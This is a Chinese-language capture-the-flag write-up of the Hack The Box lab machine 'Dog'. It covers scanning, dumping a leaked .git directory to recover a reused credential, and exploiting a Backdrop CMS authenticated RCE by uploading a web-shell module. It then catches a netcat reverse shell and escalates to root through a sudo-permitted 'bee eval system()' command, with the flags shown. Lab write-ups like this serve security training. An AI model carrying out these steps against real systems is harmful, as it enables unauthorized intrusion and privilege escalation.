Dog
Enumeration
nmap
第一次掃描發現系統對外開放了22、80端口,端口詳細信息如下
┌──(kali?kali)-[~/Desktop/vegetable/HTB]
└─$ nmap -sC -sV -p 22,80 -oA nmap 10.10.11.58
Starting Nmap 7.95 ( https://nmap.org ) at 2025-06-26 03:36 EDT
Nmap scan report for 10.10.11.58
Host is up (2.3s latency).PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.12 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 97:2a:d2:2c:89:8a:d3:ed:4d:ac:00:d2:1e:87:49:a7 (RSA)
| 256 27:7c:3c:eb:0f:26:e9:62:59:0f:0f:b1:38:c9:ae:2b (ECDSA)
|_ 256 93:88:47:4c:69:af:72:16:09:4c:ba:77:1e:3b:3b:eb (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
| http-robots.txt: 22 disallowed entries (15 shown)
| /core/ /profiles/ /README.md /web.config /admin
| /comment/reply /filter/tips /node/add /search /user/register
|_/user/password /user/login /user/logout /?q=admin /?q=comment/reply
|_http-server-header: Apache/2.4.41 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelService detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 160.93 secondsTCP/80
瀏覽頁面,在頁面底部發現cms名稱,backdrop
訪問 nmap 掃描出的一些路徑
在里面挑了一些有意思的,但沒發現什么內容
Foothold
.git文件泄露
回到cms,在網上搜索發現了一處rce漏洞,但是需要認證
用目錄掃描器掃描可能存在的其他路徑,發現 .git
用githack.py工具還原并下載
┌──(kali?kali)-[~/Desktop/vegetable/GitHack]
└─$ python GitHack.py http://10.10.11.58/.git
[+] Download and parse index file ...
[+] LICENSE.txt
[+] README.md
[+] core/.jshintignore
[+] core/.jshintrc
[+] core/authorize.php
[+] core/cron.php
[+] core/includes/actions.inc
[+] core/includes/ajax.inc
[+] core/includes/anonymous.inc
[+] core/includes/archiver.inc完成后,會出現一個以ip命名的文件夾
┌──(kali?kali)-[~/Desktop/vegetable/GitHack]
└─$ ls
10.10.11.58 GitHack.py index lib README.md在文件夾里找敏感信息時發現了mysql的用戶名密碼,考慮密碼復用
grep -i "root" 10.10.11.58
但是ssh和web都無法登陸,想著看能不能暴力破解,但是響應太慢了,看了看其他wp發現可以用郵件名,這確實是一個思路,郵件中@前的名字很有可能是其他地方的用戶名
┌──(kali?kali)-[~/Desktop/vegetable/GitHack]
└─$ grep -i "@dog.htb" 10.10.11.58 -r
10.10.11.58/files/config_83dddd18e1ec67fd8ff5bba2453c7fb3/active/update.settings.json: "tiffany@dog.htb"BackDrop RCE
得到一個用戶名,嘗試登錄tiffany:BackDropJ2024DS2024,成功登陸了,剛才看exploit database有漏洞,直接嘗試利用
┌──(kali?kali)-[~/Desktop/vegetable/HTB/Dog]
└─$ searchsploit backdrop
------------------------------------------- ---------------------------------Exploit Title | Path
------------------------------------------- ---------------------------------
Backdrop CMS 1.20.0 - 'Multiple' Cross-Sit | php/webapps/50323.html
Backdrop CMS 1.23.0 - Stored XSS | php/webapps/51905.txt
Backdrop CMS 1.27.1 - Authenticated Remote | php/webapps/52021.py
Backdrop Cms v1.25.1 - Stored Cross-Site S | php/webapps/51597.txt
------------------------------------------- ---------------------------------
Shellcodes: No Results┌──(kali?kali)-[~/Desktop/vegetable/HTB/Dog]
└─$ searchsploit -m php/webapps/52021.pyExploit: Backdrop CMS 1.27.1 - Authenticated Remote Command Execution (RCE)URL: https://www.exploit-db.com/exploits/52021Path: /usr/share/exploitdb/exploits/php/webapps/52021.pyCodes: N/AVerified: True
File Type: Python script, Unicode text, UTF-8 text executable
Copied to: /home/kali/Desktop/vegetable/HTB/Dog/52021.py直接運行python文件,先看看怎么運行,按照提示設置參數,然后就完成了,最后兩行提示Go to http://10.10.11.58/admin/modules/install and upload the shell.zip for Manual Installation.考慮在這個路徑下上傳剛才生成的文件,如果上傳成功在按照下一句提示Your shell address: http://10.10.11.58/modules/shell/shell.php,這個路徑應該就能訪問上傳的shell,看起來挺簡單
┌──(kali?kali)-[~/Desktop/vegetable/HTB/Dog]
└─$ python 52021.py http://10.10.11.58
Backdrop CMS 1.27.1 - Remote Command Execution Exploit
Evil module generating...
Evil module generated! shell.zip
Go to http://10.10.11.58/admin/modules/install and upload the shell.zip for Manual Installation.
Your shell address: http://10.10.11.58/modules/shell/shell.php但是第一步就出問題了,因為目錄結構的一些問題,證實需要在下面的路徑才能找到上傳按鈕
嘗試上傳shell.zip
卻被溫馨提示,只能上傳固定格式的,這個倒好說
查看生成payloads的腳本,嘗試修改一下腳本內容,將python代碼里的zip全部改成tar,其余地方不變,然后按照剛才的方式重新生成文件,可以看到第五行提示已經變成創建了shell.tar
┌──(kali?kali)-[~/Desktop/vegetable/HTB/Dog]
└─$ python exp.py http://10.10.11.58
Backdrop CMS 1.27.1 - Remote Command Execution Exploit
Evil module generating...
Evil module generated! shell.tar
Go to http://10.10.11.58/admin/modules/install and upload the shell.tar for Manual Installation.
Your shell address: http://10.10.11.58/modules/shell/shell.php按照相同的方式上傳 .tar 文件,顯示成功
按照腳本提示信息訪問下面的路徑,發現成功
但是這個shell很快就會被清除,先找一個合適的反向shell,拼接好,然后重新上傳 .tar 文件,快速訪問拼接好的 url,這樣在監聽端可以獲取到一個shell
┌──(kali?kali)-[~]
└─$ nc -nvlp 1234
listening on [any] 1234 ...
connect to [10.10.16.59] from (UNKNOWN) [10.10.11.58] 57888
bash: cannot set terminal process group (876): Inappropriate ioctl for device
bash: no job control in this shell
www-data@dog:/var/www/html/modules/shell$ whoami
whoami
www-dataPrivilege Escalation
目前的權限為 www-data,在 home 目錄下發現了兩個用戶
www-data@dog:/var/www/html/modules/shell$ ls /home
jobert johncusack再次考慮密碼復用,經過嘗試發現可以用剛才的密碼登錄 johncusack,因為有密碼,嘗試查看 sudo -l 內容,找到了 bee
johncusack@dog:/tmp$ sudo -l
[sudo] password for johncusack:
Matching Defaults entries for johncusack on dog:env_reset, mail_badpass,secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/binUser johncusack may run the following commands on dog:(ALL : ALL) /usr/local/bin/bee看看怎么用,翻譯一下
按照如下內容即可以root身份執行命令
johncusack@dog:~$ cd /var/www/html
johncusack@dog:/var/www/html$
johncusack@dog:/var/www/html$ sudo /usr/local/bin/bee eval "system('id');"
uid=0(root) gid=0(root) groups=0(root)
johncusack@dog:/var/www/html$ sudo /usr/local/bin/bee eval 'system("/bin/bash");'
root@dog:/var/www/html#
root@dog:/var/www/html# cat /home/johncusack/user.txt
7176e61dabe388fccd5a063ee57c616a
root@dog:/var/www/html# cat /root/root.txt
bd2e0207a6794f14909ddd58a1b836ea
)
)
)
